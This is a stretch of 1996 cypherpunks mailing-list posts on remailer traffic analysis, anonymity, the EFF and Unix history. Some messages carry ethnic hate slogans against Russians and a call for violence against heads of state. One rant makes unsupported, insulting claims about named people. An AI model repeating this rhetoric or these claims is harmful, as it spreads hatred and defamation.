ultimately to "nobody" would ensure that they circulate in the network and then disappear. Nonconservation of message number should prove annoying to an eavesdropper. (An implementation detail on this will be mentioned later.) Addressing some of them outside the network, to test newsgroups for instance might also be useful - confusing an attacker looking at the point of exit. NUMBER A possible means of matching the traffic would be to use an exponential- along the lines of those in thermodynamics. decoys = max ( D.exp(-kT) , E ) The "max" operator here ensures that every time a batch of messages is sent a minimum number of decoys will be included. Values for the constants can doubtless be suggested by remailer operators familiar with the traffic load. ..... SILENT SPAMMING Re-encryption as discussed here will not do any good if remailers allow "silent spamming". To exploit this feature the attacker addresses his messages to "nobody" (or "null" in Mixmaster jargon). These mails fill the message pool, sweeping out all the target messages, but when they come to be sent they disappear. They do not show on the net, they do not need to be recognised and eliminated from the search. All the attacker sees leaving the spammed host is undiluted target mail. Obviously the remailer should detect messages of this type and process them without storing them in the message pool. Any message that will not be delivered to a remote host comes into this category, including those to most local accounts. I briefly examined the source of 2.0.3 (from ftp://utopia.hacktic.nl/pub/replay/pub/remailer on 11 July 1996) and could not find code to deal with this attack. [Cottrell tells me this is on the to-do list.] -- Peter Allan peter.allan at aeat.co.uk From nobody at replay.com Tue Sep 3 14:26:23 1996 From: nobody at replay.com (Anonymous) Date: Wed, 4 Sep 1996 05:26:23 +0800 Subject: KILL ALL RUSSIAN IMIGRANTS Message-ID: <199609031704.TAA02114@basement.replay.com> Return-Path: To: cypherpunks at toad.com Subject: Kill all "libertarians" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 02 Sep 96 15:48:31 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com >From nobody at REPLAY.COM Mon Sep 2 12:26:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 02 Sep 96 15:42:57 EDT for dlv Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18013 for dlv at bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv at bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Message-Id: <199609021626.SAA11752 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: All russians are scum. No exceptions. Return-Path: To: cypherpunks at toad.com Subject: Re: Sen. Leahy's "impeccable cyberspace credentials" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Mon, 02 Sep 96 01:19:37 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all polititions are that bad. > > > You make it sound as if their are no politisions are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From attila at primenet.com Tue Sep 3 14:35:02 1996 From: attila at primenet.com (attila) Date: Wed, 4 Sep 1996 05:35:02 +0800 Subject: Blissful? Ignorance (was SCO giving free licenses to UNIX OpenServer) Message-ID: <199609031629.KAA02275@InfoWest.COM> ** Reply to note from Hallam-Baker 09/02/96 5:15pm -0400 --or another Hallum-Baker ignorant rant v. unix, bsd, etc. = Eric Murray wrote: = > = > Scottauge at aol.com writes: = = > > Read, Understand, and Delight... Microsoft maybe in trouble at last. = > = > I doubt it. People don't use Microsoft products because = > of their quality or functionality. = = Errmm.. hate to disappoint but SCO UNIX started life as Xenix which = was written by Microsoft in the dark ages. = = the **original** SCO product and versions up to 3.something **were** xenix --not written by MS, but simple unix V7 which was capable of 64K program and 64K data and would run on a 286. MS had a substantial investment in SCO when the old man was screwing things up (before the old man was forced out for sexual harassment --his brother had long since raped Convergent and was gated). MS had made the V7 deal with Western Electric with Billy thinking he had an exclusive on **the** way to go --better than sliced bread; V7 was not commercially available --only to universities because of a WE consent decree with the government. Billy was in seventh heaven --sure he had the deal of a lifetime! not so: Bell Labs shortly announced the breakup and decided to commercially ship System III --it was available in source code only, but the price was only about $25K in the first go around, and you could produce binaries for sublicensing for $250 or some such --it was not a great price, but it was doable. System III was not restricted to 64K plus 64K. One of my major conract customers at the time was WE --System V R2 was already available internally, including a decent VAX port (unlike the really piss-poor V32 Berkeley rewrote into BSD 4.2 --offering it back to Bell Labs for free, which was spurned from the Ivory Tower at Murrey Hill...) With the WE and AT&T breakup, and the multiple licensing activity, Gates hit the roof --threw several well known major temper tantrums, including at least one at WE/Labs that I am directly aware of. Gates vowed to bury UNIX in all flavours and has had that intention ever since --non-stop. Billy-boy does not carry a grudge lightly --he not only gets very mad and comes off the wall (or handle), but he has every intention of getting even. I've always figured Billy suffers from Tourette's for his mannerisms, his uncontrollable rage, &c. --just has not learned to manage it, and figured his Daddy could solve it all --and now there is an item of $10billion give or take a few --buys a lot of hate. part of Billy's vindictive plan against AT&T involved hiring Dave Cutler from DEC --Cutler was the self-styled leader of the VMS team, also with a bad case of temper-tantrums I saw dave literally shatter an impossible to break WE 500 series telephone simply by "hanging" it up.... (...time to clear the decks!) and that was for NT --great job! Cutler took the deal thinking he had a free hand --at Billy's place? --naive. and Dave had to put up with the Windows legacy... the crap that goes on inside NT is not all Cutler's direct fault. and that is Billy Boy and the SCO club... and death lurking in the alley for unix --but I doubt he will be able to kill it --there is just too large a crowd of professionals who refuse to use MS --not just because the product is crap, but because of Billy. = > > This is for single user home based UNIX systems. = > = > Single-user UNIX isn't all that useful. = matter of opinion --works fine, just like the big guys, on a workstation. so it limits you to one login -??? runs full multi-tasking re-entrant just like multi-user. somewhere along the line, you were standing behind the door and forgot to listen when single user limitations were defined. = Listen to the guys who built it. UNIX = is a program development environment. = that's so ludicrous, it's funny. you figure everyone just sat around playing with themselves? I wouldn't tell that to Thompson, Ritchie, Kerrigan and friends... unix was a **tool**. = In the early years it was = interesting because there was source available, that ceased to be = the case years ago. = and AT&T source has always been available at some price. BSD source from 4.2 through the current (and last) 4.4 is freely available, give Walnut Creek $29,00 and you have it all and pay the shipping from Free Software Foundation (GNU) and you have all that too (most of which is on the freeBsd and Linux CDROMs anyway. = Multi-user ain't much better. Listen to the guys who built it. apparently you never figured out there was anything after SCO's initial releases --they were junk as was their first several passes at System III and V -they tried to live with their Xenix Heritage --including trying to make System III run on a 286 --an abysmal product. today SCO is shipping SysV R4+ --the last Labs and Unix International version which also contains all BSD calls which were added by SUN under contract --it's a good solid product. however, despite years of kernal hacking for WE, I still prefer straight BSD flavours. Commercially, SUN leads that pack, followed by DEC with Ultrix which is BSD by another name... HP is sort of System V R4+ Even IBM is Unix --they just call it AIX and it is BSD based --also very solid and thoroughly supported --you can not even get IBM heavy iron without AIX --MVS &c. run as processes. Ken Olsen, founder of DEC, called unix "snake oil." DEC's VMS is good, but was originally a DCL platform. security is excellent by comparison to early unix, but it is not open (or was not, to be correct) --and source is virtually out of the question. FYI, both unix and VMS are derived from Multix... Today DEC ships Ultrix on everything, and VMS basically only on the mainframes. Ken Olsen was forced out when the sales staff blew Ford Motor Co out of the water on an immense deal, along with an even larger Fed contract --essentially the salesmen refused to sell unix (required in both bid specs) on the hardware.... DEC started sliding, and Ken was "retired." = Today Linux probably represents the future of the UNIX family, it = allows people who want to hack at the OS level access to the sources = of a fully functioning OS. This allows people to add in new kernel = features, schedulers and other exotica without having to write a = whole new O/S. = the only reasons NT will end up in big business is a) politics, b) freebies, and c) intimidation. MIS staffs will not choose it, MSNBC just canned NT 4.0 as worthless junk. Linux has a large base, but it is a warmed over version of Bell System V --rewritten supposedly from scratch by a husband/wife team (I might have believed it had it been the husband/wife team of Peter Conklin who was also on the DEC VMS gig from the gate --I gave him his first job out of Harvard in 1962 --arrogant, but 100%. = Just don't confuse it with "home computing", this is geek computing = and you better have a lot of interest in computing to use it. = that's pure bullshit, again. actually, FreeBSD is easier to handle than Linux and more professionally supported --including ongoing active development, It qualifies as home computing in my book --you take the CD, copy two disks out to kick it off, and say GO. comes up in X windows... geek code? get off your MicroSlop mentality limitation. = Home = computing is the market for users who need a system that's simpler = than a VCR or they can't use it. = that's total nonsense, your British class system is showing its ignorant face again -you are insulting what little intelligence the American middle class does have... unless you really wish to limit the users to TV set-top boxes which can "surf" a few canned sites from assholes-on-line, etc. the children of the household will never settle for that! = At one time that meant Apple, today = it means Microsoft, it will never mean Linux - not unless someone = can make Linux much much simpler than it is at present and provide = decent WISIWIG tools such as editors etc. designed for use by aunt = Ethel. = give me a break! your igonance is showing --it's plain and simple an MS advertising jugernaut! both linux and freebsd have X built in --FreeBSD actually goes directly to X at bootup --and there are plenty of tools,editors, etc in X --and freeBSD runs Linux binaries. and there are a number of high grade packages which are fully supported. Secondly, SUN binaries for X86 are no more expensive than MS is heading for with NT which they will use to "replace" W95 (W95 was just another MicroSlop holding pattern). just a simple fact: MicroSlop advertising buries anything and everything. and, if that does not work: Intimidation is just another form of Communication and Billy's real good at, witness the DOJ and FTC round 2 unfolding now. apparently your schooling is limited to MS courses.... MS is a pure virus on its own, if not the software, than certainly the company. why does MS have 85% of the desktop? --the power of money and lies --and a loud noisy parade with a bandwagon, free beer, and all that good stuff that goes with predatory market practices. fair competition? why should MS be fair when its stated goal is to take a fraction of **every** transaction on any network. Billy has no tolerance for the existence of anything other than Billy's creations and control --total control. It does not matter if W95 crashes more often than 3.1 --upgrade it for more money! Money is the name of the game at MS, not decent product for a reasonable price. Always has been, always will.... --attila -- Now, with a black jack mule you wish to harness, you walk up, look him in the eye, and hit him with a 2X4 over the left eye. If he blinks, hit him over the right eye! He'll cooperate --so will politicians. From vipul at pobox.com Tue Sep 3 14:44:55 1996 From: vipul at pobox.com (Vipul Ved Prakash) Date: Wed, 4 Sep 1996 05:44:55 +0800 Subject: [NOISE] The Doors Message-ID: <199609031936.TAA00607@fountainhead.net> The Doors was not only about freedom and love, but about crypto too! Notice these lines from the song "Five to One" Old [cipher] gets old and young get stronger May take a week baby, may take longer [to crack] they've [clinton] got the guns and we've got the numbers gonna win we will take 'em over, com'on. :) - Vipul -- Vipul Ved Prakash | - Electronic Security & Crypto vipul at pobox.com | - Internet & Intranets 91 11 2247802 | - Web Development & PERL 198 Madhuban IP Extension | - Linux & Open Systems Delhi, INDIA 110 092 | - (Networked) Multimedia From jimbell at pacifier.com Tue Sep 3 14:48:34 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 4 Sep 1996 05:48:34 +0800 Subject: The Esther Dyson Flap Message-ID: <199609031719.KAA03089@mail.pacifier.com> At 08:11 PM 9/2/96 -0700, Timothy C. May wrote: >Esther Dyson says that anonymity on the Net can do more damage than >anonymity in other forums, and thus may need to be regulated and restricted >in various ways. I disagree, as "the Net of a Million Lies" (to use Vinge's >term) has grown up with anonymity, and few people take the anonymous (or >not) rants and charges made in the millions per day with the same degree of >certainty they take print comments. Put another way, there is no clear and >present danger. Indeed, I support the elimination of concepts such as "slander" and "libel" precisely because they cause more harm than good. Currently, there is an illusion among ordinary citizens that "if that was untrue, you could sue him for libel!" despite the fact that this is rarely practical. In that way, the law actually adds credibility to what should be an incredible claim. Eliminate libel suits, and you've eliminated any presumption that because it's been spoken or is in print, it's likely to be correct. Jim Bell jimbell at pacifier.com From vznuri at netcom.com Tue Sep 3 14:59:12 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 4 Sep 1996 05:59:12 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609030930.CAA09010@mail6.netcom.com> Message-ID: <199609031737.KAA20451@netcom2.netcom.com> agree with all of BS's points... >Anonymous remailers support several things I want to do, >and that I want other people be able to do: >1) Let people have private conversations without being identified >by third parties. >2) Let people have private conversations without being identified >by each other, voluntarily and respecting each others' rights. >3) Let people broadcast things to the public that they might >be afraid to do otherwise. >4) Let people broadcast things to the public without their >reputations, good or bad, affecting readers' reactions. >5) Let people experiment with different personality and >conversation styles, though this doesn't strictly require anonymity. >6) Let people communicate with government officials without risk. I suspect all these items can be accomplished using means other than anonymous remailers. anonymous remailers are a good start, but possibly there is still technology waiting to be invented to support some of these features. one possibility that I'm very interested in: consider that Usenet was not built from the ground-up to support anonymity, nor was the sendmail system. when anonymity was introduced to Usenet, everyone went crazy, and it was only marginally supported. I think I may work on some technical proposals along these lines for future posting here, because much of this dialogue has me thinking. what cpunks might consider doing is creating an alternative message distribution system like Usenet that starts from the premise that anonymous communication is allowed and trying to grow it. btw, McCullagh's and other's claims about "ghettoization" of anonymity strike me as very specious. as long as people can use anonymity in some forum they want, I think that's acceptable. what's the equivalent of a "ghetto" in cyberspace? you can't go into a meeting of professionals wearing a ski mask, although you might be able to create such a forum yourself. does that mean you are in some kind of a "ghetto"? oh, brother. From surya at premenos.com Tue Sep 3 15:07:23 1996 From: surya at premenos.com (Surya Koneru) Date: Wed, 4 Sep 1996 06:07:23 +0800 Subject: rc2 export limits.. Message-ID: Hi, Does anyone know the export limit for RC2 Key size ? --Surya From vznuri at netcom.com Tue Sep 3 15:09:29 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 4 Sep 1996 06:09:29 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: <199609031730.KAA20063@netcom2.netcom.com> >I would put forth that you know nothing of my efforts, and therefore are >in no position to judge me. I would also put forth that the efforts of >EFF, or lack thereof, are quite public. that's my point. an entity that is willing to put its reputation on the line is inherently more valuable than one that is not, imho. all the EFF members have good public track records. what EFF has accomplished is checkered, like any battle-scarred infrantry will experience. if you expect unadulterated success, you're not living in the same reality everyone else around here is. granted, EFF has made some serious compromises in their agenda. they're finding their identity. but it doesn't help to have people rant at them and ignore their notable successes, and tend to criticize them merely because they're a public target. whenever you criticize something, please keep in mind the basic qualification: what is a better alternative? sure, EFF hasn't had stellar success, but then, who has in the agenda they are pursuing? their goals are extremely ambitious and difficult in the current climate. lack of success is proof of the difficulty, not of any incompetence, as I wrote. when you begin to understand this, you won't alienate those you are critical of. EFF members are *tremendously* open to positive comments. instead you harangue them and lose their good will to the point that they may tend to ignore cpunk comments entirely because of your very poor example. >I think any organization that would apply political pressure rather than >bow to it would be an alternative. I think an organization in touch >enough with its own policy to prevent its staff and board from making >embarassing big brother type proposals to curtail the ability of any of us >to post without attributation would be an alternative. I think an >organization without the internal conflict and strife that has clearly >marred EFF in past and made it a laughable attempt at cohesive political >persuasion would be an alternative. I think an organization that had >official policies on the core issues which it proposes to influence would >be an alternative. why don't you start one then? what you seem to fail to adequately understand is that there is virtually no organization in the world that is free from the difficulties you describe. whenever you have multiple people working together, you aren't going to have clear-cut successes. cpunks are always yelling at anything resembling organization, which really annoys me. EFF has had tremendous powerful successes in areas you are conveniently overlooking, in areas that are hard to measure, such as increasing public awareness. can you make a good case that EFF has had no positive effect? we may be living in a much darker reality without them. >In short, an organization that had even one of the needed elements of >legislative influence. (Cohesive, directed, persistent, and >uncompromising). our congress does not have this property after centuries of trying. why should a private organization totally transcend it? face it, getting things done in this world can be awfully tricky at times. you make it sound like attacking Clipper or stopping any of the legislation that has made its way into congress is a trivial endeavor. go ahead, please create a counterexample. > What is so shocking about announcing that a >given organization does not support my interests and therefore calling on >others who share my interests not to make financial donations to said >organization? you can criticize an organization without implying the people who contribute to it are incompetent, a distinction that has subtly eluded you so far. > Is there something EFF fears in free speech and political >consensus building? Perhaps if they had a straightforward policy.... no matter what they decide, they will be flamed by someone such as yourself. they do have an agenda. >Phrased another way, who cares what you are tired of hearing? the EFF ranting is periodic, and your own sour comments are a repeated feature of this list. who *are* you? why are you so critical of everything in existence? based on previous rants, you're a habitual sourpuss. >No, but when an organization espouses nothing on a given subject key to >its mission, what does that say? What about when its members espouse >entirely different and even counter productive beliefs? again, you are presuming that anonymity is key to their mission. that's a big leap of faith. there is room for honest disagreement. you haven't heard of their agenda personally, so you are assuming there is none. from what I have seen, there is a reasonably cohesive agenda going on, and I'm not, like yourself, assuming that it doesn't exist merely because I haven't seen it blared in a noisy advertisement somewhere. I agree with some of the EFF member's comments: anonymity could be a very serious quagmire to support. there are probably better trees to bark up. >I thought its point was to protect cyberspace? of course, the interpretation of what is a threat is subjective. >There aren't many battles to choose. Let's seem some action. EFF has lobbied against many of the bills you mention. again, I think you're being unfair in assuming merely because you haven't heard of them accomplishing anything, they haven't. >I do infact feel the cpunks have a greater track record than EFF. Tell >me, what has EFF done? The list of "cypherpunk" accomplishments in terms >of making the net a better place to be is, in my view, significant. >Certainly the discussion here is livelier than anything I've seen from >EFF. ah, the fundamental illusion that is going on here. discussion alone is WORTHLESS in changing the world. yet we have REAMS of it on the cpunk list. I'd say EFF has *acted* and put enormous effort into its agenda. but it is invisible because its not easily quantified. ask them how many pamphlets they have printed for the public, how much mail they have sent out to members informing them of developments, etc. consider the high-quality EFF newsletter. is there anything like that in the cpunk area? frankly I think your comparing cpunks to EFF is really laughable. they are not even in the same ballpark. it only shows how warped your concept is of what an "accomplishment" is. >You reveal here the basic character of your objection. You don't like >the fact that I criticized EFF. no, as I stated, criticism is great, but yours is written in such a way as to imply your target is incompetent. your tone has changed significantly in your letter now that I have challenged you on it. >Well what, EFF, have you done for us LATELY? EFF hasn't done much for anyone who hasn't paid their dues.. >English is not my first language. Start paying my hourly rate to type in >the thousands of words and dozens of legal summaries I send to this list >every month and I will begin to proof read carefully. your legal summaries are impressive. your rabid criticisms leave a sour taste in my mouth. measured criticism, I can deal with. >> and you, like many other cypherpunks and cyberspace weasels, >> have a whine-and-shriek-from-the-shadows bent. > >And your point is? > >You'd like the shadows lifted? Speaking without a true name attached is >somehow evil? really, an opinion without attribution is not worth as much as one with it. there's no escaping this simple concept. I agree that a pseudonym can gain a reputation, but yours has very little associated with it to qualify criticism of EFF imho. so you have posted regularly to the cpunk list. big deal. >This is EFF talking. "The situation is hopeless, bail now to preserve >image." EFF has changed its direction from working in washington. a straw man statement if I ever heard one. From jonl at well.com Tue Sep 3 15:35:21 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 06:35:21 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.16.19960903130738.422f617c@mail.well.com> At 08:06 PM 9/2/96 -0700, James A. Donald wrote: >At 06:52 AM 9/3/96 -0500, Jon Lebkowsky wrote: >> "Uncompromising" is not an "element of legislative influence," at least not >> on this planet. >Therefore the correct strategy is simply to attack any politician who shows >any interest in legislating on our issues. > >We have no friends on Capitol hill, and if we did have friends, it would >still be necessary to denounce them as enemies. As I said, on *this* planet. -- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From qut at netcom.com Tue Sep 3 16:32:31 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 07:32:31 +0800 Subject: SRP (from the cutting-room floor) In-Reply-To: <9609031622.AA26229@clare.risley.aeat.co.uk> Message-ID: <199609031909.MAA20276@netcom.netcom.com> This sounds simple to implement by users and remailers, after all, cpunk messages with bad syntax -> /dev/null . Users can implement this quite easily, simply use the cpunk more than you actually need to. You are your best decoy. I muse about the idea of remailers that freely allow anybody to access the ques of the cpunk remailers with http and telnet. If people are using the remailers properly, and the destination is usenet, there's no loss to privacy. This can even be implemented with e-mail destinations, with no loss to privacy that isn't already lost simply by using the net itself. Should this idea be implemented with the cpunk remailers, it can actually prevent the seizure of the server by the authorities, considering how they couldn't get anything they couldn't have already gotten by simply telneting or httping in. There is the reported risk of the timing cryptanalysis attacks, so a que of messages can be made inaccessable while the actual {en|de}cryption is being done. I plan on doing these things when I can get the Linux/BSD system more figured out than I have. I'm primarily intersted in learning, so I plan on keeping an open system, other than the Mixmaster binaries and other stuff affected by ITAR. From wendigo at pobox.com Tue Sep 3 16:35:20 1996 From: wendigo at pobox.com (Mark Rogaski) Date: Wed, 4 Sep 1996 07:35:20 +0800 Subject: PKS RFC Project Message-ID: <199609032023.QAA01688@charon.gti.net> -----BEGIN PGP SIGNED MESSAGE----- For anyone who is interested in contributing to our experimental RFC for public key servers, I set up a little mailing list for discussion. pks-rfc at charon.gti.net To subscribe, send a message to pks-rfc-request at charon.gti.net with "subscribe" in the subject field. mark - -- Mark Rogaski | Why read when you can just sit and | Member GTI System Admin | stare at things? | Programmers Local wendigo at gti.net | Any expressed opinions are my own | # 0xfffe wendigo at pobox.com | unless they can get me in trouble. | APL-CPIO -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMiyToBz4pZwIaHjdAQGxTQf+Pvz6tFzbncPkbj2QX6awMjVZiYcAknQx /n6JWGFpImCs+/WZJOqesUMWUXA2/Iwg1un2djZ5n8xsQKvcRzHrKwo3C8ZV9ECn KuDJe/y2ZeU5sOSvqyyDATUxSUstj4CwhTES5/OD2NcuIKkVPW/h4Gtoo5ZuPp3D wWdHjsuZ2tAZACvICpNvq3wHu2bW4Skv4p/BQeJFfRtGst/blmHrprFjjnlIXIUs yF2S60DilGjIkcAtljGbI0VgH3O8Ra2HM4pTx/bDh86YTx8SKuOiZ6KbJwZl81yt uEwkhdKrfQkp5M3FgfS1k1sIWjIm3K5u1osIqcTrTem5a1eivXqx/w== =EvkN -----END PGP SIGNATURE----- From qut at netcom.com Tue Sep 3 16:41:10 1996 From: qut at netcom.com (Dave Harman OBC) Date: Wed, 4 Sep 1996 07:41:10 +0800 Subject: rc2 export limits.. In-Reply-To: Message-ID: <199609031938.MAA26356@netcom.netcom.com> ! Hi, Does anyone know the export limit for RC2 Key size ? Who cares? We already know it isn't good enough, if it was, the size or key would be illegal to export. From dlv at bwalk.dm.com Tue Sep 3 16:49:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 07:49:17 +0800 Subject: The most ridiculous SPAM in my lifetime In-Reply-To: <199609030322.WAA13140@manifold.algebra.com> Message-ID: geek at algebra.com (Computer Geek) writes: > This is the American reincarnation of Ostap Bender. > > Next spam from him will be about interplanetary chess congress, > no less I am sure. I'm sure the few cypherpunks who haven't read the Ilf&Petrov book all saw the Mel Brooks movie (the 12 chairs) and recognized the cryptic reference. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From hack5 at juno.com Tue Sep 3 16:49:17 1996 From: hack5 at juno.com (patrick b cummings) Date: Wed, 4 Sep 1996 07:49:17 +0800 Subject: No Subject Message-ID: <19960902.151101.3470.0.hack5@juno.com> their is a new mailing list for all you hackers just email your name or handle and e-mail address and youll be subscribed send information to hack5 at juno.com From dlv at bwalk.dm.com Tue Sep 3 16:54:27 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 07:54:27 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <199609022129.OAA02339@myriad> Message-ID: <05XoTD3w165w@bwalk.dm.com> ghio at netcom.com (Matthew Ghio) writes: > $500 tops. 8MB is probably okay, 16 might improve resistance to mailbombs > a bit tho. You can get 486 motherboards for under $100 nowadays. > Do the math: used 486 MB+CPU: $100 > 16MB RAM: $150 > case+powersupply: $50 > 100MB HD: $20 FWIW, a very nice store in NYC called J&R (Park Row) is selling Digital 486 boxes for $600, including 16MB RAM, 540MB hd, and color monitor. I also bought a 16MB thingie for my kid's 486 for $109. > HD Controller: $15 > Dual 16550 Serial Card: $15 > 28800bps Modem: $150 I just got an internal 28.8Kbps modem (including fax) for $100. > ------ > $500 > > And if you really want to run a remailer, I can sell you most of the above, > and I'll even throw in a 340MB IDE HD with Linux+remailers preinstalled! > (Yes, I'm serious.) Are we talking about running a remailer over a dial-up UUCP, the way Julf did? This box runs over dial-up UUCP on 14.4K modem, with two incoming feeds. I may be willing to run a remailer to replace anon.penet.fi - let's discuss t (It used to have an outgoing feed to Moscow, but not anymore. :-) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mech at eff.org Tue Sep 3 16:55:03 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 07:55:03 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609030615.XAA00596@eff.org> Message-ID: <199609031953.MAA25374@eff.org> [This post may be fwd'd to the CP list if it does not show up there from my sending it.] Bill Stewart typed: > While nobody's called Esther Dyson a Communist here yet, there are > people on the board I disagree with - Mitch Kapor, in particular, has shown who is no longer on the board > signs of being a (gasp!) Democrat! My initial reaction to the EFF's first Democrat v. Republican is largely irrelevant here, though more relevant when you get into infrastructure, universal access, and intellectual property issues - stuff that EFF has touched on here and there, but which is not at the heart of our mission. There are other democrats on our board and staff, as well as Republicans. Even Kapor, however, is very strongly for competition, for entrepreneurs, for markets, and ergo differs from a lot of Democrats in that regard. And no one at EFF that I know of is an extreme liberal or conservative on social issues (both extremes are very censorious - the right of "ungodly" things, and the left of "un-p.c." things). So, again, I'd like to suggest that political party affiliation is approaching meaninglessness. The political axis that counts isn't l. vs. r., but civil libertarian v. authoritarian. No one at EFF is an authoritarian. > year or two was that they were doing some very good things > (the Steve Jackson defense), That was quite a bit more than a year or two ago. :) > and also had people making speeches about > the need to provide everybody with access to the Information SuperHighway. > Getting the S.266 anti-crypto-pro-wiretapping bill killed a few years > ago was what convinced me to join them, though their compromise positions > on some of the other anti-freedom bills since then have not helped > my mixed views of the organization. There were no compromise positions. We have 100% opposed implementation of such legislation. In the case of the Digital Telephony Bill (the later version of S.266, drafted by the FBI), we were simply unable to stop it, and instead had to try to strip as much FBI wish list out of it as possible and insert privacy protections. That's not a compromise, that's emergency action. We did everything we could. We are too, for numerous reasons. > Maybe. If it's a good position, it will recognize that anonymity > is a mixed blessing; there are people who use it creatively and > responsibly, like Black Unicorn and Lucky Green, and there are > spammers who abuse it to the detriment of society, like the slimeball > who used my remailer to post hatemail to the gay newsgroups with > somebody else's name attached to the bottom. On the other hand, > free speech is also a mixed blessing; there _are_ things I wish people Such a position is likely to be the one EFF takes if it takes one, which is probable. EFF in generally does not issue extremist position statements, but is careful to examine the risks as well as the benefits, and look for pro-liberty solutions to those risks. > had the good taste not to say, but I'm not going to get in Voltaire's > way while he defends to the death their right to say them... Just as an aside, in case anyone's interested, what Voltaire actually said was, "I never approved either the errors of his book, or the trivial truths he so vigorously laid down. I have, however, stoutly taken his side when absurd men have condemned him for these same truths." The "defend to the death his right to say it" paraphrase is an embellishment. :) -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From dlv at bwalk.dm.com Tue Sep 3 17:03:37 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 08:03:37 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: Enzo Michelangeli writes: > I agree with what you say, and that's exactly why all this thread is out > of focus. Blocking anything on the net is impossible, we know it and, I'm > sure, the Singapore government knows it as well. The filtering proxies Am I the only one to notice the striking similarities between the actions of the SG gubment (kill kill kill) and the self-appointed censors who keep inventing new classes of 'inappropriate' Usenet articles for which they forge cancels? First they forged cancels for any materials which was reposted too many times, then binaries cross-posted in non-binary newsgroups (supposedly cross-posting wastews bandwidth), then any articles with "cracking" information on breaking copy-protection... --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Tue Sep 3 17:09:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 08:09:08 +0800 Subject: Voting Monarchist? In-Reply-To: <9609031057.AA17091@cow.net> Message-ID: Bovine Remailer writes: > > Vote Monarchist > > who is the candidate? LaRouche? Harry Brone is a fucking statist. If he weren't, he wouldn't be running for president. Anyone who doesn't advocate killing all kings, presidents, and prime ministers is a fucking statist and should be beaten to a pulp with a rattan stick. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From frissell at panix.com Tue Sep 3 17:09:50 1996 From: frissell at panix.com (Duncan Frissell) Date: Wed, 4 Sep 1996 08:09:50 +0800 Subject: The Esther Dyson Flap Message-ID: <2.2.32.19960903204031.008a7850@panix.com> At 09:42 AM 9/3/96 -0700, Timothy C. May wrote: >However, as I said, if the top spokesman at EFF gives indication of having >views pretty much 180 degrees out of phase with our views, it's likely >we'll speak up and oppose her (or him), and perhaps even suggest that other >EFF board members look into the matter. "Free speech" is not even an issue. Everyone please take a deep breath. Slow down. Reread Esther's comments. Count to 10. Notice that nowhere does she call for state action to outlaw anonymity. She explicitly predicted a place for anonymity in her CFP'95 talk (is it on the Net anywhere?). We may disagree with her predictions of the future scope of anonymity or with her concerns about the risks of the practice but she has never called for State action. She is discussing the problems she perceives with it. That's all. Poor Esther, Forbes swatted her last week for her prediction that the Net kills copyright and now some of us are swatting her for her prediction that many of the future Net transactions will be non-anonymous. She may be wrong in this prediction but so what. Remember she is from the soft left. She is not a macho-flash radical libertarian like many of us. Save the 155 MM howitzers for the armed opposition not for our allies. DCF From mech at eff.org Tue Sep 3 17:19:44 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 08:19:44 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: <199609031904.MAA23619@eff.org> [again, since I'm not on the CP list these days, feel free to bounce this over to the list if it doesn't make it. I'm not sure what the non-subscriber posting policy is and/or whether such attempted posts are filtered out, though I seem to recall they didn't used to be.] Black Unicorn 